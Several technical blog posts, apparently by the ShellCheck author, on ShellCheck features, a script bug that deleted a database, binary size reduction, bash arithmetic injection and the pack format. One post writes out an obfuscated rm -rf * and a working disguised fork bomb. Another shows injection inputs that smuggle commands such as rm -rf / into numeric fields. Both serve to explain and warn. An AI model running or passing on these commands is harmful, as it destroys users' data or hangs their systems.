What’s new in ShellCheck v0.7.0?

ShellCheck v0.7.0 has just been released. In addition to the usual “bug fixes and improvements”, there is a set of new features:

Autofixes

A few select warnings now come with auto-fixes. In the most straight-forward case, ShellCheck shows you what it thinks the line ought to be:

In foo line 2:
echo "File size: $(stat -c %s $1)"
                              ^-- SC2086: Double quote to prevent globbing and word splitting.

Did you mean:
echo "File size: $(stat -c %s "$1")"

To actually apply the fixes, you can use ShellCheck’s new diff output format, which outputs standard Unified Diffs that can be piped into tools like git apply and patch:

$ shellcheck -f diff foo
--- a/foo
+++ b/foo
@@ -1,2 +1,2 @@
 #!/bin/sh
-echo "File size: $(stat -c %s $1)"
+echo "File size: $(stat -c %s "$1")"

For example, to apply only SC2086 fixes to all .sh file in a project:

$ shellcheck --include=SC2086 -f diff **/*.sh | git apply

Optional Checks

ShellCheck now includes a small handful of checks that are off by default. These are intended for subjective issues that a project may choose to enforce:

$ cat foo
#!/bin/sh
# shellcheck enable=require-variable-braces
name=World
echo "Hello $name"

$ shellcheck foo
In foo line 4:
echo "Hello $name"
            ^---^ SC2250: Prefer putting braces around variable references even when not strictly required.

Did you mean:
echo "Hello ${name}"

For a list of such checks, run shellcheck --list-optional

source paths

ShellCheck now allows you to specify a list of search locations for sourced scripts using a # shellcheck source-path=/my/dir directive or --source-path flag.

This is useful in several cases:

  • If all the projects’ sourced files are relative to the same directory, you can now specify this directory once instead of having to add source directives everywhere.
  • The special name SCRIPTDIR can be specified in a path to refer to the location of the script being checked, allowing ShellCheck to more conveniently discover included files from the same directory. This also works for any path relative to the script’s directory, such as SCRIPTDIR/../include/
  • Absolute paths are also grounded in the source path, so by specifying source-path=/mnt/chroot, shellcheck will look for . /bin/funcs.sh in /mnt/chroot/bin/funcs.sh. This is useful when targeting a specific system, such as an embedded one.

RC files

Rather than adding directives in each file, you can now set most of the options above in a .shellcheckrc file in the project’s root directory (or your home directory). This allows you to easily apply the same options to all scripts on a per-project/directory basis.

Bats and shflags support

ShellCheck no longer needs any preprocessing to check Bats scripts:

$ cat test.bats
#!/usr/bin/env bats

@test "addition using bc" {
  result="$(echo 2+2 | bc)"
  [ "$result" -eq 4 ]
}

$ shellcheck test.bats && echo "Success"
Success

A bats shebang will be interpreted as “bash”, and @test statements will be correctly parsed.

ShellCheck now also recognizes DEFINE_* statements from the shflags library:

DEFINE_string 'name' 'world' 'name to say hello to' 'n'
              ^----^ SC2034: FLAGS_name appears unused. Verify use (or export if used externally).

For a more extensive list of changes, check out the ChangeLog.

Happy ShellChecking!

Tricking the tricksters with a next level fork bomb

Do not copy-paste anything from this article into your shell. You have been warned.

Some people make a cruel sport out of tricking newbies into running destructive shell commands.

Often, this takes the form of crudely obscured commands like this one, which will result in a rm -rf * being executed in the current directory, deleting everything:

$(echo cm0gLXJmICoK | base64 -d)

Years ago, I came across someone doing this, and decided to trick them back.

Now, I’m not enough of a jerk to trick anyone into deleting their files, but I’m more than willing to let wanna-be hackers fork bomb themselves.

I designed a fork bomb in such a way that even when people know it’s a destructive command, they still run it! At the risk of you doing the same, here it is:

eval $(echo "I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==" | uudecode)

It looks like yet another crudely obscured command, but it’s not. It does not prey on unsuspecting newbies’ tendencies to run commands they don’t understand.

Instead, it targets people who are familiar with that kind of trick, who know it’s going to be destructive, and exploits their schadenfreude and curiosity.

For the previous command, such a person would remove the surrounding $(..) to find out what a victim would have been fooled into executing:

$ echo cm0gLXJmICoK | base64 -d
rm -rf *

But when they similarly modify this command to see what horror will befall the newbie stupid enough to run it:

echo "I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==" | uudecode

They’ll suddenly find their system slowing to a crawl until a forced reboot! As it turns out, they were the newbie all along.

You see, the eval (…dramatic pause…) was a decoy!

In fact, the uudecode, echo and $(..) were all just part of the act. They’re purely for misdirection, and don’t serve any functional purpose.

No decoding, execution or evaluation is required for the bomb to explode. Instead it’s set off by the simple expansion, in any context, of this argument:

"I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;=="

Even most of this string is just for show, designed to make it look more like uuencoded data. Here it is with all the arbitrary characters replaced with underscores:

"____________`_____&r()(____&r{,______}&r{,_____});r`_________"

And here it’s written more cleanly:

" `r() ( r & r ); r` "

Now it’s your bog standard fork bomb in a command expansion.


I went through a few iterations designing this trap. The first one was this:

eval $(echo 'a2Vrf3xvcml'\ZW%3t`r()(r|r);r`2'6a2VrZQo=' | base64 -d)

It has the same basic form, but several problems:

  • Base64 is pretty well known, and this clearly isn’t it
  • It’s quite obvious from the quotes that the literal string stops and starts
  • The fork bomb, r()(r|r);r really sticks out

base64 is almost entirely alphanumeric, e.g. bW9yZSBnYXJiYWdlIGhlcmUK, while uuencoded data (if you can even remember what it looks like), has a bunch of symbols that would obscure any embedded shell code: 1<V]M92!G87)B86=E(&AE<F4`. I broke up the long gibberish base64-ish strings with symbols to match.

For the quotes, I shoved it in simple double quotes and hoped no one would notice the amount of questionable characters put in an interpolated string.

For the bomb itself, I wanted to find a way to insert more gibberish, but without adding any spaces that attract the eyes. Making the string r longer would work, but the repetition would be noticeable.

The fix I ended up with was using brace expansion: foo.{jpg,png} expands to foo.jpg foo.png, and r{,foo} expands to r foo. This invokes r with an argument that the function ignores.

The second version was this:

eval $(echo "I<RA('1E<W3t`p&r()(rofl&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==" | uudecode)

The idea here was that rofl would be executed on every fork, filling the screen with “rofl: command not found” for some extra finesse, but I figured that such a recognizable word would attract attention and further scrutiny.

In the end, I arrived at the final version, and it was quite effective. Several people involved in the noob sniping sheepishly admitted that they fell for it.

I essentially forgot about it, but other people apparently didn’t. About a year later someone asked about it on SuperUser, where you can find an even better analysis.

And now you have the backstory as well.

A shell script that deleted a database, and how ShellCheck could have helped

Summary: We examine a real world case of how an innocent shell scripting mistake caused the deletion of a production database, and how ShellCheck (a GPLv3 shell script linting and analysis tool) would have pointed out the errors and prevented the disaster.

Disclosure: I am the ShellCheck author.

The event

Here is the sad case, taken from a recent StackOverflow post:

My developer committed a huge mistake and we cannot find our mongo database anyone in the server. Rescue please!!!

He logged into the server, and saved the following shell under ~/crontab/mongod_back.sh:

#!/bin/sh
DUMP=mongodump
OUT_DIR=/data/backup/mongod/tmp     // 备份文件临时目录
TAR_DIR=/data/backup/mongod         // 备份文件正式目录
DATE=`date +%Y_%m_%d_%H_%M_%S`      // 备份文件将以备份时间保存
DB_USER=Guitang                     // 数据库操作员
DB_PASS=qq____________              // 数据库操作员密码
DAYS=14                             // 保留最新14夭的备份
TAR_BAK="mongod_bak_$DATE.tar.gz"   // 备份文件命名格式
cd $OUT_DIR                         // 创建文件夹
rm -rf $OUT_DIR/*                   // 清空临时目录
mkdir -p $OUT_DIR/$DATE             // 创建本次备份文件夹
$DUMP -d wecard -u $DB_USER -p $DB_PASS -o $OUT_DIR/$DATE  // 执行备份命令
tar -zcvf $TAR_DIR/$TAR_BAK $OUT_DIR/$DATE       // 将备份文件打包放入正式目
find $TAR_DIR/ -mtime +%DAYS -delete             // 删除14天前的旧备洲

And then he run ./mongod_back.sh, then there were lots of permission denied, then he did Ctrl+C. Then the server shut down automatically.

He then contacted AliCloud, the engineer connected the disk to another working server, so that he could check the disk. Then, he realized that some folders have gone, including /data/ where the mongodb is!!!

PS: he did not take snapshot of the disk before.

Essentially, it’s every engineer’s nightmare.

The post-mortem of this issue is an interesting puzzle that requires only basic shell scripting knowledge. If you’d like to give it a try, now’s the time. If you’d like some hints, here’s shellcheck’s output for the script.

The rest of this post details about what happened, and how ShellCheck could have averted the disaster.

What went wrong?

The MCVE for how to ruin your week is this:

#!/bin/sh
DIR=/data/tmp    // The directory to delete
rm -rf $DIR/*    // Now delete it

The fatal error here is that // is not a comment in shell scripts. It’s a path to the root directory, equivalent to /.

On some platforms, the rm line would have been fatal by itself, because it’d boil down to rm -rf / with a few other arguments. Implementation these days often don’t allow this though. The disaster in question happened on Ubuntu, whose GNU rm would have refused:

$ rm -rf //
rm: it is dangerous to operate recursively on '//' (same as '/')
rm: use --no-preserve-root to override this failsafe

This is where the assignment comes in.

The shell treats variable assignments and commands as two sides of the same coin. Here’s the description from POSIX:

A “simple command” is a sequence of optional variable assignments and redirections, in any sequence, optionally followed by words and redirections, terminated by a control operator.

(A “simple command” is in contrast to a “compound” command, which are structures like if statements and for loops that contain one or more simple or compound commands.)

This means that var=42 and echo "Hello" are both simple commands. The former has one optional assignment and zero optional words. The latter has zero optional assignments and two optional words.

It also implies that a single simple command can contain both: var=42 echo "Hello"

To make a long spec short, assignments in a simple command will apply only to the invoked command name. If there is no command name, they apply to the current shell. This latter explains var=42 by itself, but when would you use the former?

It’s useful when you want to set a variable for a single command without affecting your the rest of your shell:

$ echo "$PAGER"  # Show current pager
less

$ PAGER="head -n 5" man ascii
ASCII(7)       Linux Programmer's Manual      ASCII(7)

NAME
       ascii  -  ASCII character set encoded in octal,
       decimal, and hexadecimal

$ echo "$PAGER"  # Current pager hasn't changed
less

This is exactly what happened unintentionally in the fatal assignment. Just like how the previous example scoped PAGER to man only, this one scoped DIR to //:

$ DIR=/data/tmp    // The directory to delete
bash: //: Is a directory

$ echo "$DIR"  # The variable is unset
(no output)

This meant that rm -rf $DIR/* became rm -rf /*, and therefore bypassed the check that was is in place for rm -rf /

(Why can’t or won’t rm simply refuse to delete /* too? Because it never sees /*: the shell expands it first, so rm sees /bin /boot /dev /data .... While rm could obviously refuse to remove first level directories as well, this starts getting in the way of legitimate usage – a big sin in the Unix philosophy)

How ShellCheck could have helped

Here’s the output from this minimized snippet (see online):

$ shellcheck myscript

In myscript line 2:
DIR=/data/tmp    // The directory to delete
                 ^-- SC1127: Was this intended as a comment? Use # in sh.


In myscript line 3:
rm -rf $DIR/*    // Now delete it
       ^----^ SC2115: Use "${var:?}" to ensure this never expands to /* .
       ^--^ SC2086: Double quote to prevent globbing and word splitting.
                 ^-- SC2114: Warning: deletes a system directory.

Two issues have already been discussed, and would have averted this disaster:

  • ShellCheck noticed that the first // was likely intended as a comment (wiki: SC1127).
  • ShellCheck pointed out that the second // would target a system directory (wiki: SC2114).

The third is a general defensive technique which would also have prevented this catastrophic rm independently of the two other fixes:

  • ShellCheck suggested using rm -rf ${DIR:?}/* to abort execution if the variable for any reason is empty or unset (wiki: SC2115).

This would mitigate the effect of a whole slew of pitfalls that can leave a variable empty, including echo /tmp | read DIR (subshells), DIR= /tmp (bad spacing) and DIR=$(echo /tmp) (potential fork/command failures).

Conclusion

Shell scripts are really convenient, but also have a large number of potential pitfalls. Many issues that would be simple, fail-fast syntax errors in other languages would instead cause a script to misbehave in confusing, annoying, or catastrophic ways. Many examples can be found in the Wooledge Bash Pitfalls list, or ShellCheck’s own gallery of bad code.

Since tooling exists, why not take advantage? Even if (or especially when!) you rarely write shell scripts, you can install shellcheck from your package manager, along with a suitable editor plugin like Flycheck (Emacs) or Syntastic (Vim), and just forget about it.

The next time you’re writing a script, your editor will show warnings and suggestions automatically. Whether or not you want to fix the more pedantic style issues, it may be worth looking at any unexpected errors and warnings. It might just save your database.

So what exactly is -ffunction-sections and how does it reduce binary size?

If you’d like a more up-to-date version of ShellCheck than what Raspbian provides, you can build your own on a Raspberry Pi Zero in a little over 21 hours.

Alternatively, as of last week, you can also download RPi compatible, statically linked armv6hf binaries of every new commit and stable release.

It’s statically linked — i.e. the executable has all its library dependencies built in — so you can expect it to be pretty big. However, I didn’t expect it to be 67MB:

build@d1044ff3bf67:/mnt/shellcheck# ls -l shellcheck
-rwxr-xr-x 1 build build 66658032 Jul 14 16:04 shellcheck

This is for a tool intended to run on devices with 512MiB RAM. strip helps shed a lot of that weight, and the post-stripped number is the one we’ll use from now on, but 36MB is still more than I expected, especially given that the x86_64 build is 23MB.

build@d1044ff3bf67:/mnt/shellcheck# strip --strip-all shellcheck
build@d1044ff3bf67:/mnt/shellcheck# ls -l shellcheck
-rwxr-xr-x 1 build build 35951068 Jul 14 16:22 shellcheck

So now what? Optimize for size? Here’s ghc -optlo-Os to enable LLVM opt size optimizations, including a complete three hour Qemu emulated rebuild of all dependencies:

build@31ef6588fdf1:/mnt/shellcheck# ls -l shellcheck
-rwxr-xr-x 1 build build 32051676 Jul 14 22:38 shellcheck

Welp, that’s not nearly enough.

The real problem is that we’re linking in both C and Haskell dependencies, from the JSON formatters and Regex libraries to bignum implemenations and the Haskell runtime itself. These have tons of functionality that ShellCheck doesn’t use, but which is still included as part of the package.

Fortunately, GCC and GHC allow eliminating this kind of dead code through function sections. Let’s look at how that works, and why dead code can’t just be eliminated as a matter of course:

An ELF binary contains a lot of different things, each stored in a section. It can have any number of these sections, each of which has a pile of attributes including a name:

  • .text stores executable code
  • .data stores global variable values
  • .symtab stores the symbol table
  • Ever wondered where compilers embed debug info? Sections.
  • Exception unwinding data, compiler version or build IDs? Sections.

This is how strip is able to safely and efficiently drop so much data: if a section has been deemed unnecessary, it’s simple and straight forward to drop it without affecting the rest of the executable.

Let’s have a look at some real data. Here’s a simple foo.c:

int foo() { return 42; }
int bar() { return foo(); }

We can compile it with gcc -c foo.c -o foo.o and examine the sections:

$ readelf -a foo.o
ELF Header:
  Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
  Class:        ELF32
  Data:         2's complement, little endian
  Version:      1 (current)
  OS/ABI:       UNIX - System V
  ABI Version:  0
  Type:         REL (Relocatable file)
  Machine:      ARM
[..]

Section Headers:
  [Nr] Name       Type      Addr   Off    Size   ES Flg Lk Inf Al
  [ 0]            NULL      000000 000000 000000 00      0   0  0
  [ 1] .text      PROGBITS  000000 000034 000034 00  AX  0   0  4
  [ 2] .rel.text  REL       000000 000190 000008 08   I  8   1  4
  [ 3] .data      PROGBITS  000000 000068 000000 00  WA  0   0  1
  [ 4] .bss       NOBITS    000000 000068 000000 00  WA  0   0  1
  [..]

Symbol table '.symtab' contains 11 entries:
   Num:    Value  Size Type    Bind   Vis      Ndx Name
   [..]
     9: 00000000    28 FUNC    GLOBAL DEFAULT    1 foo
    10: 0000001c    24 FUNC    GLOBAL DEFAULT    1 bar

There’s tons more info not included here, and it’s an interesting read in its own right. Anyways, both our functions live in the .text segment. We can see this from the symbol table’s Ndx column which says section 1, corresponding to .text. We can also see it in the disassembly:

$ objdump -d foo.o
foo.o:     file format elf32-littlearm

Disassembly of section .text:
00000000 <foo>:
   0:   e52db004   push    {fp}
   4:   e28db000   add     fp, sp, #0
   8:   e3a0302a   mov     r3, #42 ; 0x2a
   c:   e1a00003   mov     r0, r3
  10:   e28bd000   add     sp, fp, #0
  14:   e49db004   pop     {fp}
  18:   e12fff1e   bx      lr

0000001c <bar>:
  1c:   e92d4800   push    {fp, lr}
  20:   e28db004   add     fp, sp, #4
  24:   ebfffffe   bl      0 <foo>
  28:   e1a03000   mov     r3, r0
  2c:   e1a00003   mov     r0, r3
  30:   e8bd8800   pop     {fp, pc}

Now lets say that the only library function we use is foo, and we want bar removed from the final binary. This is tricky, because you can’t just modify a .text segment by slicing things out of it. There are offsets, addresses and cross-dependencies compiled into the code, and any shifts would mean trying to patch that all up. If only it was as easy as when strip removed whole sections…

This is where gcc -ffunction-sections and ghc -split-sections come in. Let’s recompile our file with gcc -ffunction-sections foo.c -c -o foo.o:

$ readelf -a foo.o
[..]
Section Headers:
  [Nr] Name          Type      Addr  Off  Size ES Flg Lk Inf Al
  [ 0]               NULL      00000 0000 0000 00      0   0  0
  [ 1] .text         PROGBITS  00000 0034 0000 00  AX  0   0  1
  [ 2] .data         PROGBITS  00000 0034 0000 00  WA  0   0  1
  [ 3] .bss          NOBITS    00000 0034 0000 00  WA  0   0  1
  [ 4] .text.foo     PROGBITS  00000 0034 001c 00  AX  0   0  4
  [ 5] .text.bar     PROGBITS  00000 0050 001c 00  AX  0   0  4
  [ 6] .rel.text.bar REL       00000 01c0 0008 08   I 10   5  4
  [..]

Symbol table '.symtab' contains 14 entries:
   Num:    Value  Size Type    Bind   Vis      Ndx Name
[..]
12: 00000000    28 FUNC    GLOBAL DEFAULT    4 foo
13: 00000000    28 FUNC    GLOBAL DEFAULT    5 bar

Look at that! Each function now has its very own section.

This means that a linker can go through and find all the sections that contain symbols we need, and drop the rest. We can enable it with the aptly named ld flag --gc-sections. You can pass that flag to ld via gcc using gcc -Wl,--gc-sections. And you can pass that whole thing to gcc via ghc using ghc -optc-Wl,--gc-sections

I enabled all of this in my builder’s .cabal/config:

program-default-options
  gcc-options: -Os -Wl,--gc-sections -ffunction-sections -fdata-sections
  ghc-options: -optc-Os -optlo-Os -split-sections

With this in place, the ShellCheck binary became a mere 14.5MB:

-rw-r--r-- 1 build build 14503356 Jul 15 10:01 shellcheck

That’s less than half the size we started out with. I’ve since applied the same flags to the x86_64 build, which brought it down from 23MB to 7MB. Snappier downloads and installs for all!


For anyone interested in compiling Haskell for armv6hf on x86_64, I spent weeks trying to get cross-compilation going, but in the end (and with many hacks) I was only able to cross-compile armv7. In the end I gave up and took the same approach as with the Windows build blog post: a Docker image runs the Raspbian armv6 userland in Qemu user emulation mode.

I didn’t even have to set up Qemu. There’s tooling from Resin.io for building ARM Docker containers for IoT purposes. ShellCheck (ab)uses this to run emulated GHC and cabal. Everything Just Works, if slowly.

The Dockerfile is available on GitHub as koalaman/armv6hf-builder.

Bash’s white collar eval: [[ $var -eq 42 ]] runs arbitrary code too

Did you know this bash snippet is open to arbitrary code execution from user input?

#!/bin/bash
read -rp "Enter guess: " num
if [[ $num -eq 42 ]]
then
  echo "Correct"
else
  echo "Wrong"
fi

Here’s an example:

$ ./myscript
Enter guess: 42
Correct

$ ./myscript
Enter guess: a[$(date >&2)]+42
Sun Feb  4 19:06:19 PST 2018
Correct

This is not a new discovery or recently introduced vulnerability, but it’s one of the lesser discussed issues in bash scripting. ksh behaves the same way, if you account for the lack of read -p.

The shell evaluates values in an arithmetic context in several syntax constructs where the shell expects an integer. This includes: $((here)), ((here)), ${var:here:here}, ${var[here]}, var[here]=.. and on either side of any [[ numerical comparator like -eq, -gt, -le and friends.

In this context, you can use or pass literal strings like "1+1" and they will evaluated as math expressions: var="1+1"; echo $((var)) outputs "2".

However, as demonstrated, it’s not just a bc style arithmetic expression evaluator, it’s more closely integrated with the shell: a="b"; b="c+1"; c=41; echo $((a)) will show 42.

And any value used as a scalar array subscript in an arithmetic context will be evaluated and interpreted as an integer — including command substitutions.

This issue is generally trivialized or ignored. It’s not pointed out in code reviews or example code, even by those who are well aware of this issue. It would be pretty tedious to use ${var//[!0-9-]/} for every comparison, and it’s often not relevant anyways.

This isn’t necessarily unfair, because arbitrary code execution is only a security issue if it also provides escalation of privileges, like when you’re doing math using values from untrusted files, or with user input from CGI scripts.

The initial example rather involves being on the other side of this airtight hatchway, where you can do the same thing much more easily by just running date instead of ./myscript in the first place.

Contrast this to eval.

It also frequently allows arbitrary code execution, but any use of it — safe or unsafe, on either side of said hatchway — is likely to elicit a number of comments ranging from cautionary to condescending.

"eval is evil", people say, even though no one ever said that "-eq is evil" or "$((foo+1)) considered harmful".

Why such a double standard?

I would argue that eval is considered bad not (just) because it’s unsafe, but because it’s lowbrow. Safety is just the easiest way to argue that people should use better constructs.

eval is considered lowbrow because it’s primary use case is letting newbies do higher level operations without really knowing how the shell works. You don’t have to know the difference between literal and syntactic quotes, or how to work with the order of expansion, as long as you can figure out roughly what you want to run and generate such commands.

Meanwhile, Bash arithmetic contexts are a convenient and useful feature frequently employed and preferred by advanced scripters.

Here’s an example of a script where you can run ./myscript 1 or ./myscript 2 to get "Foo" or "Bar" respectively. You’ve probably seen (and at some point tried) the variable-with-numeric-suffix newbie pattern:

#!/bin/bash
var1="Foo"
var2="Bar"
eval echo "\$var$1"

This example would get a pile of comments about how this is unsafe, how ./myscript '1; rm -rf /' will give you a bad time, so think of the children and use arrays instead:

#!/bin/bash
var[1]="Foo"
var[2]="Bar"
echo "${var[$1]}"

As discussed, this isn’t fundamentally more secure: ./myscript '1+a[$(rm -rf /)]' will still give you a bad time. However, since it now uses the approprate shell features in a proper way, most people will give it a pass.

Of course, this is NOT to say that anyone should feel free to use eval more liberally. There are better, easier, more readable and more correct ways to do basically anything you would ever want to do with it. If that’s not reason enough, the security argument is still valid.

It’s just worth being aware that there’s a double standard.

I have no particular goal or conclusion in mind, so what do you think? Should we complain about eval less and arithmetic contexts more? Should we ignore the issue as a lie-to-children until eval makes it clear a user is ready for The Talk about code injection? Should we all just switch to the fish shell?

Post your thoughts here or on whichever site you came from.

An ode to pack: gzip’s forgotten decompressor

The latest 4.13.9 source release of the Linux kernel is 780MiB, but thanks to xz compression, the download is a much more managable 96 MiB (an 88% reduction)

Before xz took over as the default compression format on kernel.org in 2013, following the "latest" link would have gotten you a bzip2 compressed file. The tar.bz2 would have been 115 MiB (-85%), but there’s was no defending the extra 20 MiB after xz caught up in popularity. bzip2 is all but displaced today.

bzip2 became the default in 2003, though it had long been an option over the less efficient gzip. However, since every OS, browser, language core library, phone and IoT lightswitch has built-in support for gzip, a 148 MiB (-81%) tar.gz remains an option even today.

gzip itself started taking over in 1994, before kernel.org, and before the World Wide Web went mainstream. It must have been a particularly easy sell for the fledgeling Linux kernel: it was made, used and endorsed by the mighty GNU project, it was Free Software, free of patent restrictions, and it provided powerful .zip style DEFLATE compression in a Unix friendly package.

Another nice benefit was that gzip could decompress other contemporary formats, thereby replacing contested and proprietary software.

Among the tools it could replace was compress, the de-facto Unix standard at the time. Created based on LZW in 1985, it was hampered by the same patent woes that plagued GIF files. The then-ubiquitous .Z suffix graced the first public Linux releases, but is now recognized only by the most long-bearded enthusiasts. The current release would have been 302 MiB (-61%) with compress.

Another even more obscure tool it could replace was compress‘s own predecessor, pack. This rather loosely defined collection of only partially compatible formats is why compress had to use a capital Z in its extension. pack came first, and offered straight Huffman coding with a .z extension.

With pack, our Linux release would have been 548 MiB (-30%). Compared to xz‘s 96 MiB, it’s obvious why no one has used it for decades.

Well, guess what: gzip never ended its support! Quoth the man page,

gunzip can currently decompress files created by gzip, zip,
compress, compress -H or pack.

While multiple implementations existed, these were common peculiarities:

  • They could not be used in pipes.
  • They could not represent empty files.
  • They could not compress a file with only one byte value, e.g. "aaaaaa…"
  • They could fail on "large" files. "can’t occur unless [file size] >= [16MB]", a comment said dismissively, from the time when a 10MB hard drive was a luxury few could afford.

These issues stemmed directly from the Huffman coding used. Huffman coding, developed in 1952, is basically an improvement on Morse code, where common characters like "e" get a short code like "011", while uncommon "z" gets a longer one like "111010".

  • Since you have to count the characters to figure out which are common, you can not compress in a single pass in a pipe. Now that memory is cheap, you could mostly get around that by keeping the data in RAM.

  • Empty files and single-valued files hit an edge case: if you only have a single value, the shortest code for it is the empty string. Decompressors that didn’t account for it would get stuck reading 0 bits forever. You can get around it by adding unused dummy symbols to ensure a minimum bit length of 1.

  • A file over 16MB could cause a single character to be so rare that its bit code was 25+ bits long. A decompressor storing the bits to be decoded in a 32bit value (a trick even gzip uses) would be unable to append a new 8bit byte to the buffer without displacing part of the current bit code. You can get around that by using "package merge" length restricted prefix codes over naive Huffman codes.

I wrote a Haskell implementation with all these fixes in place: koalaman/pack is available on GitHub.

During development, I found that pack support in gzip had been buggy since 2012 (version 1.6), but no one had noticed in the five years since. I tracked down the problem and I’m happy to say that version 1.9 will again restore full pack support!

Anyways, what could possibly be the point of using pack today?

There is actually one modern use case: code golfing.

This post came about because I was trying to implement the shortest possible program that would output a piece of simple ASCII art. A common trick is variations of a self-extracting shell script:

sed 1d $0|gunzip;exit
<compressed binary data here>

You can use any available compressor, including xz and bzip2, but these were meant for bigger files and have game ruining overheads. Here’s the result of compressing the ASCII art in question:

  • raw: 269 bytes
  • xz: 216 bytes
  • bzip2: 183 bytes
  • gzip: 163 bytes
  • compress: 165 bytes
  • and finally, pack: 148 bytes!

I was able to save 15 bytes by leveraging gzip‘s forgotten legacy support. This is huge in a sport where winning entries are bytes apart.

Let’s have a look at this simple file format. Here’s an example pack file header for the word "banana":

1f 1e        -- Two byte magic header
00 00 00 06  -- Original compressed length (6 bytes)

Next comes the Huffman tree. Building it is simple to do by hand, but too much for this post. It just needs to be complete, left-aligned, with eof on the right at the deepest level. Here’s the optimal tree for this string:

        /\
       /  a
      /\
     /  \
    /\   n
   b  eof

We start by encoding its depth (3), and the number of leaves on each level. The last level is encoded minus 2, because the lowest level will have between 2 and 257 leaves, while a byte can only store 0-255.

03  -- depth
01  -- level 1 only contains 'a'
01  -- level 2 only contains 'n'
00  -- level 3 contains 'b' and 'eof', -2 as mentioned

Next we encode the ASCII values of the leaves in the order from top to bottom, left to right. We can leave off the EOF (which is why it needs to be in the lower right):

61 6e 62  -- "a", "n" ,"b"

This is enough for the decompressor to rebuild the tree. Now we go on to encode the actual data.

Starting from the root, the Huffman codes are determined by adding a 0 for ever left branch and 1 for every right branch you have to take to get to your value:

a   -> right = 1
n   -> left+right = 01
b   -> left+left+left -> 000
eof -> left+left+right -> 001

banana<eof> would therefore be 000 1 01 1 01 1 001, or when grouped as bytes:

16  -- 0001 0110
C8  -- 1100 1   (000 as padding)

And that’s all we need:

$ printf '\x1f\x1e\x00\x00\x00\x06'\
'\x03\x01\x01\x00\x61\x6e\x62\x16\xc8' | gzip -d
banana

Unfortunately, the mentioned gzip bug triggers due to failing to account for leading zeroes in bit code. eof and a have values 001 and 1, so an oversimplified equality check confuses one for the other, causing gzip to terminate early:

b
gzip: stdin: invalid compressed data--length error

However, if you’re stuck with an affected version, there’s another party trick you can do: the Huffman tree has to be canonical, but it does not have to be optimal!

What would happen if we skipped the count and instead claimed that each ASCII character is equally likely? Why, we’d get a tree of depth 8 where all the leaf nodes are on the deepest level.

It then follows that each 8 bit character will be encoded as 8 bits in the output file, with the bit patterns we choose by ordering the leaves.

Let’s add a header with a dummy length to a file:

$ printf '\x1F\x1E____' > myfile.z

Now let’s append the afforementioned tree structure, 8 levels with all nodes in the last one:

$ printf '\x08\0\0\0\0\0\0\0\xFE' >> myfile.z

And let’s populate the leaf nodes with 255 bytes in an order of our choice:

$ printf "$(printf '\\%o' {0..254})" |
    tr 'A-Za-z' 'N-ZA-Mn-za-m' >> myfile.z

Now we can run the following command, enter some text, and hit Ctrl-D to "decompress" it:

$ cat myfile.z - | gzip -d 2> /dev/null
Jr unir whfg pbaivaprq TMvc gb hafpenzoyr EBG13!
<Ctrl+D>
We have just convinced GZip to unscramble ROT13!

Can you think of any other fun ways to use or abuse gzip‘s legacy support? Post a comment.